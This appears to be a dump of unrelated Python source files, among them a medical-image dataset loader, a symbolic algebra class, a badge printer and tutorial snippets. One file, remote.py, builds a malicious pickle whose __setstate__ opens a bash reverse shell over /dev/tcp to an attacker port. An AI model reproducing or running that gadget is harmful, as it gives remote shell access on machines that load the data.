| 19.961538 | 48 | 0.687861 |
f7cfec42dd43a1a13af0bbed528255972ca7cb62
| 11,408 |
py
|
Python
|
2DNet/src/dataset/dataset.py
|
BhaveshJP25/RSNA
|
48d85faf82651b1ae4fdcd829ce2d4978a858d3f
|
[
"MIT"
] | null | null | null |
2DNet/src/dataset/dataset.py
|
BhaveshJP25/RSNA
|
48d85faf82651b1ae4fdcd829ce2d4978a858d3f
|
[
"MIT"
] | null | null | null |
2DNet/src/dataset/dataset.py
|
BhaveshJP25/RSNA
|
48d85faf82651b1ae4fdcd829ce2d4978a858d3f
|
[
"MIT"
] | null | null | null |
import torch.utils.data as data
import torch
import albumentations
import cv2
import numpy as np
import random
import math
from settings import train_png_dir
def generate_transforms(image_size):
IMAGENET_SIZE = image_size
train_transform = albumentations.Compose([
albumentations.Resize(IMAGENET_SIZE, IMAGENET_SIZE),
albumentations.Normalize(mean=(0.456, 0.456, 0.456), std=(0.224, 0.224, 0.224), max_pixel_value=255.0, p=1.0)
])
val_transform = albumentations.Compose([
albumentations.Resize(IMAGENET_SIZE, IMAGENET_SIZE),
albumentations.Normalize(mean=(0.456, 0.456, 0.456), std=(0.224, 0.224, 0.224), max_pixel_value=255.0, p=1.0)
])
return train_transform, val_transform
def generate_random_list(length):
new_list = []
for i in range(length):
if i <= length/2:
weight = int(i/4)
else:
weight = int((length - i)/4)
weight = np.max([1, weight])
new_list += [i]*weight
return new_list
class RSNA_Dataset_train_by_study_context(data.Dataset):
def __init__(self,
df = None,
name_list = None,
transform = None
):
self.df = df[df['study_instance_uid'].isin(name_list)]
self.name_list = name_list
self.transform = transform
def __getitem__(self, idx):
study_name = self.name_list[idx % len(self.name_list)]
study_train_df = self.df[self.df['study_instance_uid']==study_name]
print(study_train_df.head())
study_index = random.choice(generate_random_list(study_train_df.shape[0]-1))
slice_id = study_name + '_' + str(study_index)
filename = study_train_df[study_train_df['slice_id']==slice_id]['filename'].values[0]
if study_index == (study_train_df.shape[0]-1):
filename_up = filename
else:
slice_id_up = study_name + '_' + str(study_index+1)
filename_up = study_train_df[study_train_df['slice_id']==slice_id_up]['filename'].values[0]
if study_index == 0:
filename_down = filename
else:
slice_id_down = study_name + '_' + str(study_index-1)
filename_down = study_train_df[study_train_df['slice_id']==slice_id_down]['filename'].values[0]
# print(train_png_dir)
# print("\n")
# print(filename)
image = cv2.imread(train_png_dir + filename, 0)
image = cv2.resize(image, (512, 512))
image_up = cv2.imread(train_png_dir + filename_up, 0)
image_up = cv2.resize(image_up, (512, 512))
image_down = cv2.imread(train_png_dir + filename_down, 0)
image_down = cv2.resize(image_down, (512, 512))
image_cat = np.concatenate([image_up[:,:,np.newaxis], image[:,:,np.newaxis], image_down[:,:,np.newaxis]],2)
label = torch.FloatTensor(study_train_df[study_train_df['filename']==filename].loc[:, 'any': 'subdural'].values)
if random.random() < 0.5:
image_cat = cv2.cvtColor(image_cat, cv2.COLOR_BGR2RGB)
image_cat = aug_image(image_cat, is_infer=False)
if self.transform is not None:
augmented = self.transform(image=image_cat)
image_cat = augmented['image'].transpose(2, 0, 1)
# print(label)
# exit(0)
return image_cat, label
def __len__(self):
return len(self.name_list) * 4
class RSNA_Dataset_val_by_study_context(data.Dataset):
def __init__(self,
df = None,
name_list = None,
transform = None
):
self.df = df
self.name_list = name_list
self.transform = transform
def __getitem__(self, idx):
filename = self.name_list[idx % len(self.name_list)]
filename_train_df = self.df[self.df['filename']==filename]
study_name = filename_train_df['study_instance_uid'].values[0]
study_index = int(filename_train_df['slice_id'].values[0].split('_')[-1])
study_train_df = self.df[self.df['study_instance_uid']==study_name]
if study_index == (study_train_df.shape[0]-1):
filename_up = filename
else:
slice_id_up = study_name + '_' + str(study_index+1)
filename_up = study_train_df[study_train_df['slice_id']==slice_id_up]['filename'].values[0]
if study_index == 0:
filename_down = filename
else:
slice_id_down = study_name + '_' + str(study_index-1)
filename_down = study_train_df[study_train_df['slice_id']==slice_id_down]['filename'].values[0]
image = cv2.imread(train_png_dir + filename, 0)
image = cv2.resize(image, (512, 512))
image_up = cv2.imread(train_png_dir + filename_up, 0)
image_up = cv2.resize(image_up, (512, 512))
image_down = cv2.imread(train_png_dir + filename_down, 0)
image_down = cv2.resize(image_down, (512, 512))
image_cat = np.concatenate([image_up[:,:,np.newaxis], image[:,:,np.newaxis], image_down[:,:,np.newaxis]],2)
label = torch.FloatTensor(study_train_df[study_train_df['filename']==filename].loc[:, 'any':'subdural'].values)
image_cat = aug_image(image_cat, is_infer=True)
if self.transform is not None:
augmented = self.transform(image=image_cat)
image_cat = augmented['image'].transpose(2, 0, 1)
return image_cat, label
def __len__(self):
return len(self.name_list)
def randomHorizontalFlip(image, u=0.5):
if np.random.random() < u:
image = cv2.flip(image, 1)
return image
def randomVerticleFlip(image, u=0.5):
if np.random.random() < u:
image = cv2.flip(image, 0)
return image
def randomRotate90(image, u=0.5):
if np.random.random() < u:
image[:,:,0:3] = np.rot90(image[:,:,0:3])
return image
#===================================================origin=============================================================
def random_cropping(image, ratio=0.8, is_random = True):
height, width, _ = image.shape
target_h = int(height*ratio)
target_w = int(width*ratio)
if is_random:
start_x = random.randint(0, width - target_w)
start_y = random.randint(0, height - target_h)
else:
start_x = ( width - target_w ) // 2
start_y = ( height - target_h ) // 2
zeros = image[start_y:start_y+target_h,start_x:start_x+target_w,:]
zeros = cv2.resize(zeros ,(width,height))
return zeros
def cropping(image, ratio=0.8, code = 0):
height, width, _ = image.shape
target_h = int(height*ratio)
target_w = int(width*ratio)
if code==0:
start_x = ( width - target_w ) // 2
start_y = ( height - target_h ) // 2
elif code == 1:
start_x = 0
start_y = 0
elif code == 2:
start_x = width - target_w
start_y = 0
elif code == 3:
start_x = 0
start_y = height - target_h
elif code == 4:
start_x = width - target_w
start_y = height - target_h
elif code == -1:
return image
zeros = image[start_y:start_y+target_h,start_x:start_x+target_w,:]
zeros = cv2.resize(zeros ,(width,height))
return zeros
def random_erasing(img, probability=0.5, sl=0.02, sh=0.4, r1=0.3):
if random.uniform(0, 1) > probability:
return img
for attempt in range(100):
area = img.shape[0] * img.shape[1]
target_area = random.uniform(sl, sh) * area
aspect_ratio = random.uniform(r1, 1 / r1)
h = int(round(math.sqrt(target_area * aspect_ratio)))
w = int(round(math.sqrt(target_area / aspect_ratio)))
if w < img.shape[1] and h < img.shape[0]:
x1 = random.randint(0, img.shape[0] - h)
y1 = random.randint(0, img.shape[1] - w)
if img.shape[2] == 3:
img[x1:x1 + h, y1:y1 + w, :] = 0.0
else:
print('!!!!!!!! random_erasing dim wrong!!!!!!!!!!!')
return
return img
return img
def randomShiftScaleRotate(image,
shift_limit=(-0.0, 0.0),
scale_limit=(-0.0, 0.0),
rotate_limit=(-0.0, 0.0),
aspect_limit=(-0.0, 0.0),
borderMode=cv2.BORDER_CONSTANT, u=0.5):
if np.random.random() < u:
height, width, channel = image.shape
angle = np.random.uniform(rotate_limit[0], rotate_limit[1])
scale = np.random.uniform(1 + scale_limit[0], 1 + scale_limit[1])
aspect = np.random.uniform(1 + aspect_limit[0], 1 + aspect_limit[1])
sx = scale * aspect / (aspect ** 0.5)
sy = scale / (aspect ** 0.5)
dx = round(np.random.uniform(shift_limit[0], shift_limit[1]) * width)
dy = round(np.random.uniform(shift_limit[0], shift_limit[1]) * height)
cc = np.math.cos(angle / 180 * np.math.pi) * sx
ss = np.math.sin(angle / 180 * np.math.pi) * sy
rotate_matrix = np.array([[cc, -ss], [ss, cc]])
box0 = np.array([[0, 0], [width, 0], [width, height], [0, height], ])
box1 = box0 - np.array([width / 2, height / 2])
box1 = np.dot(box1, rotate_matrix.T) + np.array([width / 2 + dx, height / 2 + dy])
box0 = box0.astype(np.float32)
box1 = box1.astype(np.float32)
mat = cv2.getPerspectiveTransform(box0, box1)
image = cv2.warpPerspective(image, mat, (width, height), flags=cv2.INTER_LINEAR, borderMode=borderMode,
borderValue=(
0, 0,
0,))
return image
def aug_image(image, is_infer=False):
if is_infer:
image = randomHorizontalFlip(image, u=0)
image = np.asarray(image)
image = cropping(image, ratio=0.8, code=0)
return image
else:
image = randomHorizontalFlip(image)
height, width, _ = image.shape
image = randomShiftScaleRotate(image,
shift_limit=(-0.1, 0.1),
scale_limit=(-0.1, 0.1),
aspect_limit=(-0.1, 0.1),
rotate_limit=(-30, 30))
image = cv2.resize(image, (width, height))
image = random_erasing(image, probability=0.5, sl=0.02, sh=0.4, r1=0.3)
ratio = random.uniform(0.6,0.99)
image = random_cropping(image, ratio=ratio, is_random=True)
return image
def generate_dataset_loader(df_all, c_train, train_transform, train_batch_size, c_val, val_transform, val_batch_size, workers):
train_dataset = RSNA_Dataset_train_by_study_context(df_all, c_train, train_transform)
val_dataset = RSNA_Dataset_val_by_study_context(df_all, c_val, val_transform)
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=train_batch_size,
shuffle=True,
num_workers=workers,
pin_memory=True,
drop_last=True)
val_loader = torch.utils.data.DataLoader(
val_dataset,
batch_size=val_batch_size,
shuffle=False,
num_workers=workers,
pin_memory=True,
drop_last=False)
return train_loader, val_loader
| 35.428571 | 127 | 0.585905 |
791a1d723e3ac41611111288856b9455ae2db9b4
| 7,325 |
py
|
Python
|
resources/mechanics_lib/api/symbolic.py
|
PRECISE/ROSLab
|
2a6a295b71d4c73bc5c6ae2ec0330274afa31d0d
|
[
"Apache-2.0"
] | 7 |
2016-01-20T02:33:00.000Z
|
2021-02-04T04:06:57.000Z
|
resources/mechanics_lib/api/symbolic.py
|
PRECISE/ROSLab
|
2a6a295b71d4c73bc5c6ae2ec0330274afa31d0d
|
[
"Apache-2.0"
] | null | null | null |
resources/mechanics_lib/api/symbolic.py
|
PRECISE/ROSLab
|
2a6a295b71d4c73bc5c6ae2ec0330274afa31d0d
|
[
"Apache-2.0"
] | 3 |
2016-10-05T07:20:30.000Z
|
2017-11-20T10:36:50.000Z
|
import math
from operator import add, mul, div, sub
class Symbol:
def __init__(self, name, default=None):
self.name = name
self.default = default
def __str__(self):
return self.name
def __repr__(self):
if self.default is None:
return 'SYMB[%s]' % self.name
else:
return 'SYMB[%s=%f]' % (self.name, self.default)
def toLinearExpr(self):
return LinearExpr({self: 1})
def testResult(result, op, *args):
assert abs(LinearExpr.evalDefault(result) - op(*[LinearExpr.evalDefault(x) for x in args])) < 1e-6
def tested(op):
def decorator(f):
def actual(*args):
result = f(*args)
testResult(result, op, *args)
return result
return actual
return decorator
class LinearExpr:
def __init__(self, coeffs=None, const=0.0):
if not coeffs: coeffs = {}
self.coeffs = {}
self.const = float(const)
if abs(self.const) < 1e-7:
self.const = 0.0
for symbol in coeffs:
if not abs(coeffs[symbol]) < 1e-7:
self.coeffs[symbol] = coeffs[symbol]
@tested(add)
def __add__(self, other):
if not isinstance(other, LinearExpr):
return self + LinearExpr(const=other)
newcoeffs = dict(self.coeffs)
for var in other.coeffs:
if var in newcoeffs:
newcoeffs[var] += other.coeffs[var]
else:
newcoeffs[var] = other.coeffs[var]
return LinearExpr(newcoeffs, self.const + other.const)
__radd__ = __add__
@tested(mul)
def __mul__(self, other):
if isinstance(other, LinearExpr):
if len(self.coeffs) == 0:
return other * self.const
if len(other.coeffs) == 0:
return self * other.const
raise ("Multiplying two non-const linear expressions would result in a non-linear expression", self, other)
else:
scale = float(other)
newcoeffs = {}
for var in self.coeffs:
newcoeffs[var] = self.coeffs[var] * scale
return LinearExpr(newcoeffs, self.const * scale)
__rmul__ = __mul__
@tested(lambda x,y:float(x)/y)
def __div__(self, other):
if not isinstance(other, LinearExpr):
return self * (1.0 / other)
elif len(other.coeffs)==0:
return self * (1.0 / other.const)
else:
ratio = [None]
def feedNewRatio(newRatio):
if ratio[0] is None:
ratio[0] = newRatio
elif abs(ratio[0] - newRatio) < 1e-6:
pass
else:
raise ("Cannot divide due to non-constant quotient", self, other)
for symbol in set(self.coeffs.keys() + other.coeffs.keys()):
vala = self.coeffs[symbol] if symbol in self.coeffs else 0.0
valb = other.coeffs[symbol] if symbol in other.coeffs else 0.0
if valb == 0.0:
raise ("Cannot divide due to non-constant quotient or division by zero", self, other)
feedNewRatio(vala / valb)
if ratio[0] is None:
return self.const / other.const
else:
if not (abs(self.const) < 1e-6 and abs(self.const) < 1e-6):
feedNewRatio(self.const / other.const)
return ratio[0]
@tested(lambda x,y:float(y)/x)
def __rdiv__(self, other):
if abs(other) < 1e-6 and self.coeffs != 0.0:
return 0
else:
raise ("Cannot divide due to non-constant quotient or division by zero", self, other)
@tested(sub)
def __sub__(self, other):
if not isinstance(other, LinearExpr):
return self - LinearExpr(const=other)
newcoeffs = dict(self.coeffs)
for var in other.coeffs:
if var in newcoeffs:
newcoeffs[var] -= other.coeffs[var]
else:
newcoeffs[var] = -other.coeffs[var]
return LinearExpr(newcoeffs, self.const - other.const)
@tested(lambda x,y:y-x)
def __rsub__(self, other):
return LinearExpr(const=other) - self
@tested(lambda x:-x)
def __neg__(self):
newcoeffs = {}
for var in self.coeffs:
newcoeffs[var] = -self.coeffs[var]
return LinearExpr(newcoeffs, -self.const)
@staticmethod
@tested(lambda a,b:math.atan2(a,b))
def atan2(a, b):
if not isinstance(a, LinearExpr):
a = LinearExpr(const=a)
if not isinstance(b, LinearExpr):
b = LinearExpr(const=b)
defaultA = LinearExpr.evalDefault(a)
defaultB = LinearExpr.evalDefault(b)
res = [math.atan2(defaultA, defaultB)] # enclosed in array to get around closure issues
def feedNewRes(newRes):
if abs(abs(newRes - res[0]) - math.pi) < 1e-6:
pass
elif abs(newRes - res[0]) < 1e-6:
pass
else:
raise ("Cannot take atan2 of two linear expressions that do not have a constant ratio", a, b)
for symbol in set(a.coeffs.keys() + b.coeffs.keys()):
vala = a.coeffs[symbol] if symbol in a.coeffs else 0.0
valb = b.coeffs[symbol] if symbol in b.coeffs else 0.0
feedNewRes(math.atan2(vala, valb))
if res is None:
return math.atan2(a.const, b.const)
else:
if not (abs(a.const) < 1e-7 and abs(b.const) < 1e-7):
feedNewRes(math.atan2(a.const, b.const))
return res[0]
@staticmethod
@tested(lambda a,b:math.hypot(a,b))
def hypot(a, b):
if not isinstance(a, LinearExpr):
a = LinearExpr(const=a)
if not isinstance(b, LinearExpr):
b = LinearExpr(const=b)
LinearExpr.atan2(a, b) # ensure that the ratio is constant
aEval = LinearExpr.evalDefault(a)
bEval = LinearExpr.evalDefault(b)
result = math.hypot(aEval, bEval)
if max(abs(aEval), abs(bEval)) < 1e-6:
return LinearExpr(const=0.0)
elif abs(aEval) < abs(bEval):
return result / bEval * b
else:
return result / aEval * a
def eval(self, assignment):
newcoeffs = {}
const = self.const
for var in self.coeffs:
if var in assignment:
const += self.coeffs[var] * assignment[var]
else:
newcoeffs[var] = self.coeffs[var]
if len(newcoeffs) > 0:
return LinearExpr(newcoeffs, const)
else:
return const
@staticmethod
def evalDefault(expr):
if not isinstance(expr, LinearExpr):
return expr
assignment = {}
for symbol in expr.coeffs:
if symbol.default is None:
raise ("Cannot evaluate default, symbol missing default", expr)
assignment[symbol] = symbol.default
return expr.eval(assignment)
def __str__(self):
res = ''
first = True
if self.const != 0.0:
res += str(self.const)
first = False
for symbol in self.coeffs:
coeff = self.coeffs[symbol]
if coeff > 0 and not first:
res += '+' + str(coeff) + str(symbol.name)
else:
res += str(coeff) + str(symbol.name)
first = False
if res == '':
return '0.0'
return res
def __eq__(self, other):
if not isinstance(other, LinearExpr):
return self.__eq__(LinearExpr(const=other))
return (self.coeffs, self.const) == (other.coeffs, other.const)
def __hash__(self):
if len(self.coeffs) == 0:
return hash(self.const)
return hash((frozenset(self.coeffs.iteritems()), self.const))
@staticmethod
def round(expr, dig):
if not isinstance(expr, LinearExpr):
return LinearExpr.round(LinearExpr(const=expr), dig)
else:
newcoeffs = {}
for var in expr.coeffs:
newcoeffs[var] = round(expr.coeffs[var], dig)
return LinearExpr(newcoeffs, round(expr.const, dig))
__repr__ = __str__
| 29.417671 | 113 | 0.625119 |
f776538d6282674313ee6dc35b608e379b9e103d
| 462 |
py
|
Python
|
python/pickle/remote.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
python/pickle/remote.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
python/pickle/remote.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
import pickle
import os
class foobar:
def __init__(self):
pass
def __getstate__(self):
return self.__dict__
def __setstate__(self, state):
# The attack is from 192.168.1.10
# The attacker is listening on port 8080
os.system('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.1681.10/8080 0>&1"')
my_foobar = foobar()
my_pickle = pickle.dumps(my_foobar)
my_unpickle = pickle.loads(my_pickle)
| 22 | 83 | 0.621212 |
f783c7d956c2efc0cb4921dd6357b6611624950a
| 572 |
py
|
Python
|
lintcode/035-[DUP]-Search-Insert-Position/SearchInsertPosition_001.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2015-12-16T04:01:03.000Z
|
2015-12-16T04:01:03.000Z
|
lintcode/035-[DUP]-Search-Insert-Position/SearchInsertPosition_001.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2016-02-09T06:00:07.000Z
|
2016-02-09T07:20:13.000Z
|
lintcode/035-[DUP]-Search-Insert-Position/SearchInsertPosition_001.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 2 |
2019-06-27T09:07:26.000Z
|
2019-07-01T04:40:13.000Z
|
class Solution:
"""
@param A : a list of integers
@param target : an integer to be inserted
@return : an integer
"""
def searchInsert(self, A, target):
# write your code here
l, r = 0, len(A) - 1
while l <= r:
m = (l + r) / 2
if A[m] == target:
return m
elif A[m] > target:
r = m - 1
else:
l = m + 1
return l
sl = Solution()
A = [1, 3, 5, 6]
target = [5, 2, 7, 0]
for t in target:
print
sl.searchInsert(A, t)
| 20.428571 | 45 | 0.431818 |
e3cdadd33382dcd22537074f84cb4cc19d050097
| 1,423 |
py
|
Python
|
prepareTables.py
|
flying-sheep/optolith-client
|
dd3077164e31696b0bb0c8ae8fb895f99ebba6f1
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
prepareTables.py
|
flying-sheep/optolith-client
|
dd3077164e31696b0bb0c8ae8fb895f99ebba6f1
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
prepareTables.py
|
flying-sheep/optolith-client
|
dd3077164e31696b0bb0c8ae8fb895f99ebba6f1
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
import base64
import os
import os.path
import sys
import zipfile
import cryptography
from cryptography.fernet import Fernet
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
def decryptTables():
print("Decrypting tables")
# Obtain key from enviroment variable
key = os.environ['OPTOLITH_KEY']
# Create encryption key
salt = b'optolithSalt'
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=salt,
iterations=100000,
backend=default_backend())
cryptoKey = base64.urlsafe_b64encode(kdf.derive(key.encode(encoding='UTF-8')))
# Encrypt file
f = Fernet(cryptoKey)
with open("Tables.crypto", "rb") as sourceFile:
with open("Tables.zip", "wb") as targetFile:
# encrypted = base64.encodebytes(sourceFile.read())
decrypted = f.decrypt(sourceFile.read())
targetFile.write(decrypted)
print("Tables decrypted")
def prepareTables():
print("Unpacking tables")
# Unpack zip file
os.mkdir("app/Database")
with zipfile.ZipFile("Tables.zip", 'r') as zip_ref:
zip_ref.extractall("app/Database")
print("Tables unpacked")
if __name__ == "__main__":
print("Start to prepare tables...")
decryptTables()
prepareTables()
print("Preparing tables finished")
| 27.365385 | 82 | 0.696416 |
583543d3f10a9e7a836f64188b7503eb2a4a8e08
| 5,422 |
py
|
Python
|
badgeprinter.py
|
pintman/badgeprinter
|
c8030624a3f2cd33bf8e0b041175e0257eabf815
|
[
"MIT"
] | null | null | null |
badgeprinter.py
|
pintman/badgeprinter
|
c8030624a3f2cd33bf8e0b041175e0257eabf815
|
[
"MIT"
] | 1 |
2017-07-01T12:14:47.000Z
|
2017-07-09T11:00:37.000Z
|
badgeprinter.py
|
pintman/badgeprinter
|
c8030624a3f2cd33bf8e0b041175e0257eabf815
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -'''- coding: utf-8 -'''-
import sys
import subprocess
from PySide.QtCore import *
from PySide.QtGui import *
from PySide.QtDeclarative import *
import PIL
import PIL.Image
import sqlite3
import random
from time import sleep
import os
import configparser
os.chdir(os.path.dirname(os.path.realpath(__file__)))
class MyHandler(QObject):
def __init__(self, window, app, hashtag, logo_filename, *args, **kwargs):
QObject.__init__(self, *args, **kwargs)
self.window = window
self.app = app
self.hashtag = hashtag
self.logo_filename = logo_filename
self.conn = sqlite3.connect('badges.db')
c = self.conn.cursor()
c.execute(""" CREATE TABLE IF NOT EXISTS badges (created datetime, name text, twitter text, ticket text) """)
self.conn.commit()
def get_ticket_number(self):
c = self.conn.cursor()
while True:
ticket = "%04d" % random.randint(1,9999)
c.execute(""" SELECT count(*) FROM badges WHERE ticket=? """, (ticket,))
if c.fetchone()[0] == 0:
c.close()
return ticket
@Slot()
def run(self):
inputTwitter = window.rootObject().findChild(QObject, 'inputTwitter')
inputTwitter.select(0,0)
if inputTwitter.property('text') == "@twitter" or len(inputTwitter.property("text")) < 1:
inputTwitter.setProperty("visible", False)
inputName = window.rootObject().findChild(QObject, 'inputName')
inputName.select(0,0)
checkboxSelected = window.rootObject().findChild(QObject, 'checkboxSelected').property('visible')
label = window.rootObject().findChild(QObject, 'textLos')
ticket = ''
if checkboxSelected:
ticket = self.get_ticket_number()
label.setProperty("text", "Los #%s" % ticket)
#label.setProperty("visible", True)
inputName.setProperty('focus', False)
inputTwitter.setProperty('focus', False)
badge = window.rootObject().findChild(QObject, 'badge')
image = QPixmap.grabWidget(window, badge.x(), badge.y(), badge.width(), badge.height())
window.rootObject().findChild(QObject, "animateNameBadgeOff").start()
self.app.processEvents(QEventLoop.AllEvents, 2000)
bytes = QByteArray()
buffer = QBuffer(bytes)
buffer.open(QIODevice.WriteOnly)
image.save(buffer, "PNG")
density = 284 / (38.0/50.0)
convert = subprocess.Popen(['convert', '-density', '%d' % density, '-quality', '100', 'png:-', '-gravity', 'center', '-resize', '2430x1420!', '/tmp/badge.pdf'], stdin=subprocess.PIPE)
convert.communicate(bytes.data())
lpr = subprocess.Popen(['lpr', '-PBrother_QL-710W', '-o', 'fit-to-page', '/tmp/badge.pdf'])
lpr.communicate()
#convert.stdout.close()
#convert.wait()#
c = self.conn.cursor()
c.execute(""" INSERT INTO badges (created, name, twitter,
ticket) VALUES (datetime('now'),?,?,?) """,
(inputName.property('text'), inputTwitter.property('text'),
ticket))
self.conn.commit()
c.close()
QTimer.singleShot(2000, lambda: self.reset_ui())
def reset_ui(self):
label = window.rootObject().findChild(QObject, 'textLos')
label.setProperty("text", "Los #XXXX")
inputName = window.rootObject().findChild(QObject, 'inputName')
inputName.setProperty('text', "Vorname")
inputName.selectAll()
inputName.setProperty('focus', True)
inputTwitter = window.rootObject().findChild(QObject, 'inputTwitter')
inputTwitter.setProperty("visible", True)
inputTwitter.setProperty('text', "@twitter")
txtHashtag = window.rootObject().findChild(QObject, 'textHashtag')
txtHashtag.setProperty("text", self.hashtag)
imgLogo = window.rootObject().findChild(QObject, 'imgLogo')
imgLogo.setProperty('source', self.logo_filename)
window.rootObject().findChild(QObject, 'checkboxSelected').setProperty("visible", True)
window.rootObject().findChild(QObject, 'printButtonArea').setProperty('enabled', True)
window.rootObject().findChild(QObject, "animateNameBadgeOn").start()
# Our main window
class MainWindow(QDeclarativeView):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.setWindowTitle("Main Window")
# Renders 'view.qml'
self.setSource(QUrl.fromLocalFile('view.qml'))
# QML resizes to main window
self.setResizeMode(QDeclarativeView.SizeRootObjectToView)
if __name__ == '__main__':
# read config
config = configparser.ConfigParser()
config.read("config.ini")
# Create the Qt Application
app = QApplication(sys.argv)
# Create and show the main window
window = MainWindow()
window.setWindowFlags(Qt.FramelessWindowHint)
handler = MyHandler(window, app, hashtag=config['default']['hashtag'],
logo_filename=config['default']['logo_filename'])
handler.reset_ui()
window.rootContext().setContextProperty("handler", handler)
window.rootObject().findChild(QObject, 'inputName').selectAll()
window.showFullScreen()
# Run the main Qt loop
sys.exit(app.exec_())
| 36.884354 | 193 | 0.632239 |
5475bff1e28db07ad788dae614bde2a3e0dbdf44
| 191 |
py
|
Python
|
exercises/en/exc_03_14_03.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | 2 |
2020-07-07T01:46:37.000Z
|
2021-04-20T03:19:43.000Z
|
exercises/en/exc_03_14_03.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/en/exc_03_14_03.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
import spacy
nlp = spacy.blank("en")
people = ["David Bowie", "Angela Merkel", "Lady Gaga"]
# Create a list of patterns for the PhraseMatcher
patterns = [nlp(person) for person in people]
| 21.222222 | 54 | 0.712042 |
5491672aaacc47d79cd598167ffc71acb67f4987
| 19,823 |
py
|
Python
|
python/en/archive/books/jump2python/j2p-05_6_1-import_modules.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/archive/books/jump2python/j2p-05_6_1-import_modules.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/archive/books/jump2python/j2p-05_6_1-import_modules.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
j2p-05_6-import_modules.py
p.251, 05-6. 외장 함수
The Python Standard Library¶
https://docs.python.org/3/library/index.html
Copy & Paste the commands in this script.
이 스크립트의 명령어는 복사해서 Python prompt >>> 에 붙이기로 실행.
"""
#%% sys
# sys 모듈로 파이썬 인터프리터가 제공하는 변수와 함수를 직접 제어할 수 있다.
# sys.argv 명령 행에서 인수 전달하기
# argv_test.py
import sys
print( sys.argv )
# 윈도우즈
# > python test.py abc pey guido
# 리눅스
# $ python test.py abc pey guido
#
# 파이썬 명령어를 위와 같이 실행하면
# 입력인수 (test.py abc pey guido)가 sys.argv라는 리스트에 저장된다.
# ['test.py', 'abc', 'pey', 'guido']
# sys.exit 강제로 스크립트 종료하기
# >>> sys.exit()
# 를 실행하면 Ctrl + Z, Ctrl+D를 눌러서 대화형 이넡프리터를 종료하는 것과 같다.
# sys.path 자신이 만든 모듈 불러와 사용하기
# sys.path는 파이썬 모듈이 저장된 위치를 나타낸다.
# 이 경로에 있는 파이썬 모듈들은 어디에서나 불러올 수 있다.
# Windows 10의 Ubuntu Linux
# aimldl@DESKTOP-HPVQJ6N:/mnt/c/Users/aimldl/Desktop$ python3
# Python 3.6.7 (default, Oct 22 2018, 11:32:17)
# [GCC 8.2.0] on linux
# Type "help", "copyright", "credits" or "license" for more information.
# >>> import sys
# >>> sys.path
# ['', '/usr/lib/python36.zip', '/usr/lib/python3.6', '/usr/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/dist-packages', '/usr/lib/python3/dist-packages']
# >>>
# '' = 현재 디렉터리
# Windows 10의 Anaconda Prompt
# (base) C:\Users\aimldl>python
# Python 3.7.3 (default, Mar 27 2019, 17:13:21) [MSC v.1915 64 bit (AMD64)] :: Anaconda, Inc. on win32
# Type "help", "copyright", "credits" or "license" for more information.
# >>> import sys
# >>> sys.path
# ['', 'C:\\Users\\aimldl\\Anaconda3\\python37.zip', 'C:\\Users\\aimldl\\Anaconda3\\DLLs', 'C:\\Users\\aimldl\\Anaconda3\\lib', 'C:\\Users\\aimldl\\Anaconda3', 'C:\\Users\\aimldl\\Anaconda3\\lib\\site-packages', 'C:\\Users\\aimldl\\Anaconda3\\lib\\site-packages\\win32', 'C:\\Users\\aimldl\\Anaconda3\\lib\\site-packages\\win32\\lib', 'C:\\Users\\aimldl\\Anaconda3\\lib\\site-packages\\Pythonwin']
# >>>
# path_append.py
import sys
sys.path.append('C:\\Python\\Mymodules')
#%% pickle
# pickle모듈로 객체의 형태를 그대로 유지하면서, 파일에 저장하고 불러올 수 있다.
# write2pickle.py
import pickle
f = open('test.txt','wb')
data = {1:'python', 2:'you need'}
pickle.dump( data,f )
f.close()
# read_thru_pickle.py
import pickle
f = open('test.txt','rb')
data = pickle.load( f )
print( data )
# {2:'you need', 1:'python'}
#%% OS
# OS모듈로 환경변수, 디렉토리, 파일 등 OS자원을 제어할 수 있다.
####################################################
# os.environ 내 시스템의 환경 변수 값을 알고 싶을 때 #
####################################################
# 시스템은 제각기 다른 환경변수 값을 가지고 있다. 그 값을 확인할 수 있다.
import os
os.environ
# Windows 10의 Anaconda Prompt
#environ({'ALLUSERSPROFILE': 'C:\\ProgramData',
# 'APPDATA': 'C:\\Users\\aimldl\\AppData\\Roaming',
# 'COMMONPROGRAMFILES': 'C:\\Program Files\\Common Files',
# 'COMMONPROGRAMFILES(X86)': 'C:\\Program Files (x86)\\Common Files',
# 'COMMONPROGRAMW6432': 'C:\\Program Files\\Common Files',
# 'COMPUTERNAME': 'DESKTOP-HPVQJ6N',
